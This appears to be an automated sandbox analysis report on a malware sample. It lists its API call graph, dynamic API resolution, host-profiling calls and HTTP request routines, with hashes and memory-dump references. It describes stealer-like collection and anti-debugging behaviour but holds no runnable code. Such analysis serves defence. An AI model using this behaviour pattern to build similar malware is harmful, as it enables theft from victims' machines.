lstrcpy 29834 5af65e 29773->29834 29774 5af100 35 API calls 29774->29834 29775 5af5e0 lstrcpy 29775->29820 29776 5af88a StrCmpCA 29783 5b0061 29776->29783 29776->29820 29777 5af788 StrCmpCA 29777->29776 29777->29834 29778 5af70d lstrcpy 29778->29834 29779 5afbcb StrCmpCA 29791 5afff8 29779->29791 29779->29820 29780 5af8ba lstrlen 29780->29820 29781 5aff0b StrCmpCA 29788 5aff1f Sleep 29781->29788 29796 5aff35 29781->29796 29782 5b0083 lstrlen 29789 5b009f 29782->29789 29783->29782 29784 5b007b lstrcpy 29783->29784 29784->29782 29785 5af7be lstrcpy 29785->29834 29786 591410 8 API calls 29786->29834 29787 5afbfb lstrlen 29787->29820 29788->29820 29794 5b00c0 lstrlen 29789->29794 29799 5b00b8 lstrcpy 29789->29799 29790 5b001a lstrlen 29803 5b0036 29790->29803 29791->29790 29792 5b0012 lstrcpy 29791->29792 29792->29790 29793 5afa26 lstrcpy 29793->29820 29801 5b00dc 29794->29801 29795 5af8ed lstrcpy 29795->29820 29797 5aff57 lstrlen 29796->29797 29800 5aff4f lstrcpy 29796->29800 29810 5aff73 29797->29810 29798 5afd66 lstrcpy 29798->29820 29799->29794 29800->29797 29811 5b00fd 29801->29811 29817 5b00f5 lstrcpy 29801->29817 29802 5afc2e lstrcpy 29802->29820 29804 5aff94 lstrlen 29803->29804 29805 5b004f lstrcpy 29803->29805 29816 5affb0 29804->29816 29805->29804 29807 5afa56 lstrcpy 29807->29834 29808 5af910 lstrcpy 29808->29820 29809 591410 8 API calls 29809->29820 29810->29804 29814 5aff8c lstrcpy 29810->29814 29818 591510 4 API calls 29811->29818 29812 5aefe0 28 API calls 29812->29820 29813 5afc51 lstrcpy 29813->29820 29814->29804 29815 5afd96 lstrcpy 29815->29834 29821 5affd1 29816->29821 29822 5affc9 lstrcpy 29816->29822 29817->29811 29836 5affdd 29818->29836 29819 5af812 lstrcpy 29819->29834 29820->29769 29820->29770 29820->29771 29820->29772 29820->29773 29820->29775 29820->29776 29820->29779 29820->29780 29820->29781 29820->29787 29820->29793 29820->29795 29820->29798 29820->29802 29820->29807 29820->29808 29820->29809 29820->29812 29820->29813 29820->29815 29824 5af964 lstrcpy 29820->29824 29827 5afca5 lstrcpy 29820->29827 29820->29834 29823 591510 4 API calls 29821->29823 29822->29821 29823->29836 29824->29820 29825 5afab5 lstrcpy 29825->29834 29826 5afb30 StrCmpCA 29826->29779 29826->29834 29827->29820 29828 5afdf5 lstrcpy 29828->29834 29829 5afe70 StrCmpCA 29829->29781 29829->29834 29830 5afb63 lstrcpy 29830->29834 29831 5aefe0 28 API calls 29831->29834 29832 5afea3 lstrcpy 29832->29834 29833 5afbb7 lstrcpy 29833->29834 29834->29774 29834->29777 29834->29778 29834->29779 29834->29781 29834->29785 29834->29786 29834->29819 29834->29820 29834->29825 29834->29826 29834->29828 29834->29829 29834->29830 29834->29831 29834->29832 29834->29833 29835 5afef7 lstrcpy 29834->29835 29835->29834 29836->28865 29839 5b735d 29837->29839 29838 5b737f 29838->28871 29839->29838 29840 5b736d lstrcpy lstrcat 29839->29840 29840->29838 29842 5b7216 29841->29842 29843 5b722c lstrcpy 29842->29843 29844 5b07f2 29842->29844 29843->29844 29845 5b26e0 GetWindowsDirectoryA 29844->29845 29846 5b272c GetVolumeInformationA 29845->29846 29847 5b2725 29845->29847 29848 5b278c GetProcessHeap RtlAllocateHeap 29846->29848 29847->29846 29850 5b27c2 29848->29850 29851 5b27c6 wsprintfA 29848->29851 29852 5b7210 lstrcpy 29850->29852 29851->29850 29853 5b07fb 29852->29853 29854 5b7240 29853->29854 29855 5b724c 29854->29855 29856 5b080b 29855->29856 29857 5b7258 lstrcpy 29855->29857 29858 594b80 29856->29858 29857->29856 29859 594ba0 29858->29859 29860 594bb5 29859->29860 29861 594bad lstrcpy 29859->29861 30072 594ae0 29860->30072 29861->29860 29863 594bc0 29864 594bfc lstrcpy 29863->29864 29865 594c08 29863->29865 29864->29865 29866 594c2f lstrcpy 29865->29866 29867 594c3b 29865->29867 29866->29867 29868 594c5f lstrcpy 29867->29868 29869 594c6b 29867->29869 29868->29869 29870 594c9d lstrcpy 29869->29870 29871 594ca9 29869->29871 29870->29871 29872 594cdc InternetOpenA StrCmpCA 29871->29872 29873 594cd0 lstrcpy 29871->29873 29874 594d10 29872->29874 29873->29872 29875 5953e8 InternetCloseHandle CryptStringToBinaryA 29874->29875 30076 5b3e10 29874->30076 29877 595418 LocalAlloc 29875->29877 29892 595508 29875->29892 29878 59542f CryptStringToBinaryA 29877->29878 29877->29892 29879 595459 lstrlen 29878->29879 29880 595447 LocalFree 29878->29880 29881 59546d 29879->29881 29880->29892 29883 595493 lstrlen 29881->29883 29884 595487 lstrcpy 29881->29884 29882 594d2a 29885 594d53 lstrcpy lstrcat 29882->29885 29886 594d68 29882->29886 29888 5954ad 29883->29888 29884->29883 29885->29886 29887 594d8a lstrcpy 29886->29887 29889 594d92 29886->29889 29887->29889 29890 5954bf lstrcpy lstrcat 29888->29890 29891 5954d2 29888->29891 29893 594da1 lstrlen 29889->29893 29890->29891 29894 595501 29891->29894 29896 5954f9 lstrcpy 29891->29896 29892->28889 29895 594db9 29893->29895 29894->29892 29897 594dc5 lstrcpy lstrcat 29895->29897 29898 594ddc 29895->29898 29896->29894 29897->29898 29899 594e05 29898->29899 29900 594dfd lstrcpy 29898->29900 29901 594e0c lstrlen 29899->29901 29900->29899 29902 594e22 29901->29902 29903 594e2e lstrcpy lstrcat 29902->29903 29904 594e45 29902->29904 29903->29904 29905 594e66 lstrcpy 29904->29905 29906 594e6e 29904->29906 29905->29906 29907 594e95 lstrcpy lstrcat 29906->29907 29908 594eab 29906->29908 29907->29908 29909 594ed4 29908->29909 29910 594ecc lstrcpy 29908->29910 29911 594edb lstrlen 29909->29911 29910->29909 29912 594ef1 29911->29912 29913 594efd lstrcpy lstrcat 29912->29913 29914 594f14 29912->29914 29913->29914 29915 594f3d 29914->29915 29916 594f35 lstrcpy 29914->29916 29917 594f44 lstrlen 29915->29917 29916->29915 29918 594f5a 29917->29918 29919 594f66 lstrcpy lstrcat 29918->29919 29920 594f7d 29918->29920 29919->29920 29921 594fa9 29920->29921 29922 594fa1 lstrcpy 29920->29922 29923 594fb0 lstrlen 29921->29923 29922->29921 29924 594fcb 29923->29924 29925 594fdc lstrcpy lstrcat 29924->29925 29926 594fec 29924->29926 29925->29926 29927 59500a lstrcpy lstrcat 29926->29927 29928 59501d 29926->29928 29927->29928 29929 59503b lstrcpy 29928->29929 29930 595043 29928->29930 29929->29930 29931 595051 InternetConnectA 29930->29931 29931->29875 29932 595080 HttpOpenRequestA 29931->29932 29933 5950bb 29932->29933 29934 5953e1 InternetCloseHandle 29932->29934 29935 5b7340 3 API calls 29933->29935 29934->29875 29936 5950cb 29935->29936 30083 5b72b0 29936->30083 29938 5950d4 30087 5b72f0 29938->30087 29941 5b72b0 lstrcpy 29942 5950f0 29941->29942 29943 5b7340 3 API calls 29942->29943 29944 595105 29943->29944 29945 5b72b0 lstrcpy 29944->29945 29946 59510e 29945->29946 29947 5b7340 3 API calls 29946->29947 29948 595124 29947->29948 29949 5b72b0 lstrcpy 29948->29949 29950 59512d 29949->29950 29951 5b7340 3 API calls 29950->29951 29952 595143 29951->29952 29953 5b72b0 lstrcpy 29952->29953 29954 59514c 29953->29954 29955 5b7340 3 API calls 29954->29955 29956 595161 29955->29956 29957 5b72b0 lstrcpy 29956->29957 29958 59516a 29957->29958 29959 5b72f0 2 API calls 29958->29959 29960 59517d 29959->29960 29961 5b72b0 lstrcpy 29960->29961 29962 595186 29961->29962 29963 5b7340 3 API calls 29962->29963 29964 59519b 29963->29964 29965 5b72b0 lstrcpy 29964->29965 29966 5951a4 29965->29966 29967 5b7340 3 API calls 29966->29967 29968 5951b9 29967->29968 29969 5b72b0 lstrcpy 29968->29969 29970 5951c2 29969->29970 29971 5b72f0 2 API calls 29970->29971 29972 5951d5 29971->29972 29973 5b72b0 lstrcpy 29972->29973 29974 5951de 29973->29974 29975 5b7340 3 API calls 29974->29975 29976 5951f3 29975->29976 29977 5b72b0 lstrcpy 29976->29977 29978 5951fc 29977->29978 29979 5b7340 3 API calls 29978->29979 29980 595212 29979->29980 29981 5b72b0 lstrcpy 29980->29981 29982 59521b 29981->29982 29983 5b7340 3 API calls 29982->29983 29984 595231 29983->29984 29985 5b72b0 lstrcpy 29984->29985 29986 59523a 29985->29986 29987 5b7340 3 API calls 29986->29987 29988 59524f 29987->29988 29989 5b72b0 lstrcpy 29988->29989 29990 595258 29989->29990 29991 5b72f0 2 API calls 29990->29991 29992 59526b 29991->29992 29993 5b72b0 lstrcpy 29992->29993 29994 595274 29993->29994 29995 5952ac 29994->29995 29996 5952a0 lstrcpy 29994->29996 29997 5b72f0 2 API calls 29995->29997 29996->29995 29998 5952ba 29997->29998 29999 5b72f0 2 API calls 29998->29999 30000 5952c7 29999->30000 30001 5b72b0 lstrcpy 30000->30001 30002 5952d1 30001->30002 30003 5952e1 lstrlen lstrlen HttpSendRequestA InternetReadFile 30002->30003 30004 5953cc InternetCloseHandle 30003->30004 30008 595322 30003->30008 30006 5953de 30004->30006 30005 59532d lstrlen 30005->30008 30006->29934 30007 59535e lstrcpy lstrcat 30007->30008 30008->30004 30008->30005 30008->30007 30009 5953a3 30008->30009 30010 59539b lstrcpy 30008->30010 30011 5953aa InternetReadFile 30009->30011 30010->30009 30011->30004 30011->30008 30013 5a8d2d 30012->30013 30014 5a8d26 ExitProcess 30012->30014 30015 5a8f42 30013->30015 30016 5a8dba lstrlen 30013->30016 30017 5a8e1d StrCmpCA 30013->30017 30018 5a8e3d StrCmpCA 30013->30018 30019 5a8e5d StrCmpCA 30013->30019 30020 5a8e7d StrCmpCA 30013->30020 30021 5a8e9d StrCmpCA 30013->30021 30022 5a8d90 lstrlen 30013->30022 30023 5a8eb6 StrCmpCA 30013->30023 30024 5a8ee8 lstrlen 30013->30024 30025 5a8ecf StrCmpCA 30013->30025 30026 5a8d66 lstrlen 30013->30026 30027 5a8de4 StrCmpCA 30013->30027 30028 5a8e04 StrCmpCA 30013->30028 30029 5a8f1b lstrcpy 30013->30029 30015->28891 30016->30013 30017->30013 30018->30013 30019->30013 30020->30013 30021->30013 30022->30013 30023->30013 30024->30013 30025->30013 30026->30013 30027->30013 30028->30013 30029->30013 30030->28897 30031->28899 30032->28905 30033->28907 30034->28913 30035->28915 30036->28921 30037->28925 30038->28931 30039->28933 30040->28937 30041->28952 30042->28955 30043->28953 30044->28949 30045->28953 30046->28972 30047->28956 30048->28960 30049->28962 30050->28968 30051->28969 30052->28975 30053->28982 30054->28984 30055->29008 30056->29011 30057->29014 30058->29007 30059->29014 30060->29021 30063 59151f 30062->30063 30064 59152b lstrcpy 30063->30064 30065 591533 30063->30065 30064->30065 30066 59154d lstrcpy 30065->30066 30067 591555 30065->30067 30066->30067 30068 59156f lstrcpy 30067->30068 30070 591577 30067->30070 30068->30070 30069 591599 30069->29743 30070->30069 30071 591591 lstrcpy 30070->30071 30071->30069 30073 594af0 30072->30073 30073->30073 30074 594af7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 30073->30074 30075 594b61 30074->30075 30075->29863 30077 5b3e23 30076->30077 30078 5b3e3f lstrcpy 30077->30078 30079 5b3e4b 30077->30079 30078->30079 30080 5b3e6d lstrcpy 30079->30080 30081 5b3e75 GetSystemTime 30079->30081 30080->30081 30082 5b3e93 30081->30082 30082->29882 30084 5b72bc 30083->30084 30085 5b72e4 30084->30085 30086 5b72dc lstrcpy 30084->30086 30085->29938 30086->30085 30089 5b730c 30087->30089 30088 5950e7 30088->29941 30089->30088 30090 5b731d lstrcpy lstrcat 30089->30090 30090->30088 30111 5b30d0 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 30112 59d4c9 140 API calls 30091 5b8849 free free free __getptd 30123 5a0549 126 API calls 30151 5a2749 298 API calls 30113 5b74ce 5 API calls ctype 30152 5b9741 128 API calls __setmbcp 30092 5b3040 GetSystemPowerStatus 30124 5b2940 GetCurrentProcess IsWow64Process 30125 5b0946 1955 API calls 30142 591a64 162 API calls 30157 59b3f9 98 API calls 30158 5a6ff9 138 API calls 30159 5b27f3 lstrcpy 30095 5b2c70 GetUserDefaultLocaleName LocalAlloc CharToOemW 30096 599876 143 API calls __setmbcp_nolock 30114 59bce9 90 API calls 30115 5b08e8 1960 API calls 30128 5ae169 147 API calls 30160 5a86a6 47 API calls 30117 59df00 497 API calls 30098 5b3c60 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 30118 5a8ce1 16 API calls 30153 5b3360 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 30161 595799 57 API calls 30143 5ae219 140 API calls 30099 5a86a6 48 API calls 30100 5a7743 1332 API calls 30101 5aac12 120 API calls 30135 5b3190 GetSystemInfo wsprintfA 30162 5ba2b0 __CxxFrameHandler 30119 5b0889 1965 API calls 30129 5a3d09 244 API calls 30155 5a6709 675 API calls 30130 5b2d00 11 API calls 30149 5b0a80 685 API calls 30156 5b2b00 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 30138 5915b9 200 API calls 30163 59a3b9 165 API calls 30105 5a2839 290 API calls 30164 5b2bb0 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 30107 5a5036 295 API calls 30131 5b4e55 7 API calls 30139 59f9a9 144 API calls 30108 5b082a 1975 API calls 30120 5b84a1 120 API calls 2 library calls 30145 5b0a21 692 API calls 30109 5b2820 10 API calls 30110 5b3420 6 API calls 30121 5b44a0 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 30146 5b3220 7 API calls

                              Executed Functions

                              Function 00594B80 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00594BAF
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00594C02
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00594C35
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00594C65
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00594CA3
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00594CD6
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00594CE6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: 346989addaecf4751c747110f26abe5a4eb1ee8b1d86ccfb1b410b4a45f50fd6
                              • Instruction ID: c9471029cadabd9f2727de7c6af959ac3501f20962dacd337b5891cd16b6cc3a
                              • Opcode Fuzzy Hash: 346989addaecf4751c747110f26abe5a4eb1ee8b1d86ccfb1b410b4a45f50fd6
                              • Instruction Fuzzy Hash: FD522E3191161AABDF11AFA4CC4DEAE7FB9BF84700F154428F905A7251EB34ED468BA0
                              Function 005B63C0 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1467 5b63c0-5b63ed GetPEB 1468 5b65f3-5b6653 LoadLibraryA * 5 1467->1468 1469 5b63f3-5b65ee call 5b6320 GetProcAddress * 20 1467->1469 1471 5b6668-5b666f 1468->1471 1472 5b6655-5b6663 GetProcAddress 1468->1472 1469->1468 1473 5b669c-5b66a3 1471->1473 1474 5b6671-5b6697 GetProcAddress * 2 1471->1474 1472->1471 1476 5b66b8-5b66bf 1473->1476 1477 5b66a5-5b66b3 GetProcAddress 1473->1477 1474->1473 1478 5b66c1-5b66cf GetProcAddress 1476->1478 1479 5b66d4-5b66db 1476->1479 1477->1476 1478->1479 1481 5b66dd-5b6702 GetProcAddress * 2 1479->1481 1482 5b6707-5b670a 1479->1482 1481->1482
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,01602700), ref: 005B6419
                              • GetProcAddress.KERNEL32(74DD0000,016028E0), ref: 005B6432
                              • GetProcAddress.KERNEL32(74DD0000,016028B0), ref: 005B644A
                              • GetProcAddress.KERNEL32(74DD0000,01602940), ref: 005B6462
                              • GetProcAddress.KERNEL32(74DD0000,016095C8), ref: 005B647B
                              • GetProcAddress.KERNEL32(74DD0000,015F53D0), ref: 005B6493
                              • GetProcAddress.KERNEL32(74DD0000,015F52F0), ref: 005B64AB
                              • GetProcAddress.KERNEL32(74DD0000,01602718), ref: 005B64C4
                              • GetProcAddress.KERNEL32(74DD0000,016028F8), ref: 005B64DC
                              • GetProcAddress.KERNEL32(74DD0000,01602850), ref: 005B64F4
                              • GetProcAddress.KERNEL32(74DD0000,01602730), ref: 005B650D
                              • GetProcAddress.KERNEL32(74DD0000,015F5310), ref: 005B6525
                              • GetProcAddress.KERNEL32(74DD0000,01602748), ref: 005B653D
                              • GetProcAddress.KERNEL32(74DD0000,01602868), ref: 005B6556
                              • GetProcAddress.KERNEL32(74DD0000,015F5570), ref: 005B656E
                              • GetProcAddress.KERNEL32(74DD0000,01602880), ref: 005B6586
                              • GetProcAddress.KERNEL32(74DD0000,01602928), ref: 005B659F
                              • GetProcAddress.KERNEL32(74DD0000,015F5470), ref: 005B65B7
                              • GetProcAddress.KERNEL32(74DD0000,016026E8), ref: 005B65CF
                              • GetProcAddress.KERNEL32(74DD0000,015F55D0), ref: 005B65E8
                              • LoadLibraryA.KERNEL32(01602A60,?,?,?,005B1BE3), ref: 005B65F9
                              • LoadLibraryA.KERNEL32(01602A48,?,?,?,005B1BE3), ref: 005B660B
                              • LoadLibraryA.KERNEL32(01602A30,?,?,?,005B1BE3), ref: 005B661D
                              • LoadLibraryA.KERNEL32(01602A78,?,?,?,005B1BE3), ref: 005B662E
                              • LoadLibraryA.KERNEL32(01602AA8,?,?,?,005B1BE3), ref: 005B6640
                              • GetProcAddress.KERNEL32(75A70000,016029E8), ref: 005B665D
                              • GetProcAddress.KERNEL32(75290000,01602A90), ref: 005B6679
                              • GetProcAddress.KERNEL32(75290000,01602A00), ref: 005B6691
                              • GetProcAddress.KERNEL32(75BD0000,01602A18), ref: 005B66AD
                              • GetProcAddress.KERNEL32(75450000,015F54D0), ref: 005B66C9
                              • GetProcAddress.KERNEL32(76E90000,01609598), ref: 005B66E5
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 005B66FC
                              Strings
                              • NtQueryInformationProcess, xrefs: 005B66F1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 59e2796342f089df391a30f29f4ec43c2746515fa01d218c485b9701096efa28
                              • Instruction ID: b45e8016249b27d471233435b602f8b28df12388b4bf7d218addee8d49aaf8b5
                              • Opcode Fuzzy Hash: 59e2796342f089df391a30f29f4ec43c2746515fa01d218c485b9701096efa28
                              • Instruction Fuzzy Hash: 2CA13CB5A11206DFD794DF64EC4CE263BB9F788740704C51EEA5683360EB3CA880DB69
                              Function 00596B80 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2188 596b80-596ba4 call 592840 2191 596bb5-596bd7 call 594ae0 2188->2191 2192 596ba6-596bab 2188->2192 2196 596bd9 2191->2196 2197 596bea-596bfa call 592840 2191->2197 2192->2191 2193 596bad-596baf lstrcpy 2192->2193 2193->2191 2198 596be0-596be8 2196->2198 2201 596c08-596c35 InternetOpenA StrCmpCA 2197->2201 2202 596bfc-596c02 lstrcpy 2197->2202 2198->2197 2198->2198 2203 596c3a-596c3c 2201->2203 2204 596c37 2201->2204 2202->2201 2205 596de8-596dfb call 592840 2203->2205 2206 596c42-596c62 InternetConnectA 2203->2206 2204->2203 2215 596e09-596e20 call 592930 * 2 2205->2215 2216 596dfd-596dff 2205->2216 2207 596c68-596c9d HttpOpenRequestA 2206->2207 2208 596de1-596de2 InternetCloseHandle 2206->2208 2210 596ca3-596ca5 2207->2210 2211 596dd4-596dde InternetCloseHandle 2207->2211 2208->2205 2213 596cbd-596ced HttpSendRequestA HttpQueryInfoA 2210->2213 2214 596ca7-596cb7 InternetSetOptionA 2210->2214 2211->2208 2218 596cef-596d13 call 5b7210 call 592930 * 2 2213->2218 2219 596d14-596d24 call 5b3d30 2213->2219 2214->2213 2216->2215 2220 596e01-596e03 lstrcpy 2216->2220 2219->2218 2229 596d26-596d28 2219->2229 2220->2215 2231 596dcd-596dce InternetCloseHandle 2229->2231 2232 596d2e-596d47 InternetReadFile 2229->2232 2231->2211 2232->2231 2234 596d4d 2232->2234 2236 596d50-596d55 2234->2236 2236->2231 2237 596d57-596d7d call 5b7340 2236->2237 2240 596d7f call 592930 2237->2240 2241 596d84-596d91 call 592840 2237->2241 2240->2241 2245 596da1-596dcb call 592930 InternetReadFile 2241->2245 2246 596d93-596d97 2241->2246 2245->2231 2245->2236 2246->2245 2247 596d99-596d9b lstrcpy 2246->2247 2247->2245
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00596BAF
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00596C02
                              • InternetOpenA.WININET(005BD014,00000001,00000000,00000000,00000000), ref: 00596C15
                              • StrCmpCA.SHLWAPI(?,0160EF20), ref: 00596C2D
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00596C55
                              • HttpOpenRequestA.WININET(00000000,GET,?,0160E880,00000000,00000000,-00400100,00000000), ref: 00596C90
                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00596CB7
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00596CC6
                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00596CE5
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00596D3F
                              • lstrcpy.KERNEL32(00000000,?), ref: 00596D9B
                              • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00596DBD
                              • InternetCloseHandle.WININET(00000000), ref: 00596DCE
                              • InternetCloseHandle.WININET(?), ref: 00596DD8
                              • InternetCloseHandle.WININET(00000000), ref: 00596DE2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00596E03
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                              • String ID: ERROR$GET
                              • API String ID: 3687753495-3591763792
                              • Opcode ID: 316608cd32e2bb807f267afefdaaff7dbc32125a1962fb2c23507770ab69fef3
                              • Instruction ID: c193a46b53b40020b59fc171b52ee599873e7579e90f08a1d49a03f08bca4124
                              • Opcode Fuzzy Hash: 316608cd32e2bb807f267afefdaaff7dbc32125a1962fb2c23507770ab69fef3
                              • Instruction Fuzzy Hash: 0B816171A4131AABDF20DFA4DC49FAE7BB8BF44700F144158FA05E7290EB74AD458BA4
                              Function 00594980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2372 594980-594a1c RtlAllocateHeap 2389 594a9a-594ade VirtualProtect 2372->2389 2390 594a1e-594a23 2372->2390 2391 594a26-594a98 2390->2391 2391->2389
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005949C3
                              • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00594AD0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
